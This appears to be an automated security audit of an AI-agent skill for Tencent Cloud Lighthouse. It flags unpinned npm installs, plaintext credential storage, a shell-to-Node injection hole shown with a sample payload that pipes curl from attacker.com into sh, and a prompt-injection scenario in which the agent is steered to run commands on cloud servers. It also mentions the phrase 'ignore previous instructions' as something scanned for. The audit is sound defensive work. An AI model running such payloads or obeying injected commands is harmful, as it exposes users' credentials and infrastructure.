Is lhanyun/tencentcloud-lighthouse-skill safe?

setup.sh configures the lighthouse MCP server to run via npx -y lighthouse-mcp-server with no version pin, no integrity check, and no --ignore-scripts. This means the npm registry's current latest version of lighthouse-mcp-server is downloaded and executed every time mcporter starts the server. A compromised or typosquatted package version would silently gain access to the host and to ~/.mcporter/mcporter.json (which contains cloud API credentials) without any reinstallation step.

setup.sh constructs a Node.js script string using direct bash variable interpolation of $SECRET_ID and $SECRET_KEY inside double-quoted JavaScript. If a user or attacker supplies a credential value containing single quotes or Node.js expression syntax (e.g., '; require('child_process').execSync('curl attacker.com | sh'); var x = '), the embedded script executes attacker-controlled Node.js on the local machine with the user's privileges. While exploitation requires a user to provide a malicious credential, the pattern is unsafe and breaks if standard TC credentials ever contain these characters.

SKILL.md instructs the agent to ask the user for their Tencent Cloud SecretId and SecretKey and then pass those values as command-line arguments to setup.sh. The credentials appear in the agent's context window and in shell process arguments (potentially visible in /proc). While this is the intended functionality, a malicious skill author could use the identical pattern to harvest credentials for a different service.

The setup script writes the user's Tencent Cloud API credentials in plaintext to ~/.mcporter/mcporter.json. Any process running as the same user (including other skills, browser automation, or a compromised npm package) can trivially read this file and access cloud resources with full API permissions.

The SKILL.md documents and encourages use of lighthouse.execute_command which runs arbitrary shell or PowerShell commands on cloud instances. If this skill is active alongside a prompt-injection-vulnerable skill or a malicious user request, the agent could be directed to run arbitrary commands on production cloud infrastructure, exfiltrate data, install backdoors, or destroy resources.

inotifywait and auditd PATH records show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCP credentials were opened at two time windows (1771924108 and 1771924132). Process lineage and timing match the audit harness's own canary placement and verification passes (sudo context, precedes skill installation at 1771924127). The canary integrity check confirms no exfiltration occurred. This is not attributed to the skill.

setup.sh runs npm install -g mcporter without a version constraint. While mcporter appears to be the legitimate CLI for the openclaw ecosystem, installing global npm packages without pinning creates a persistent software dependency that could be exploited via a future supply chain compromise of the mcporter package.

Full review of SKILL.md found no invisible unicode characters, HTML comments, base64-encoded instructions, 'ignore previous instructions' directives, or attempts to override system prompt behavior. The skill's instructions are transparent and scoped to Tencent Cloud Lighthouse management.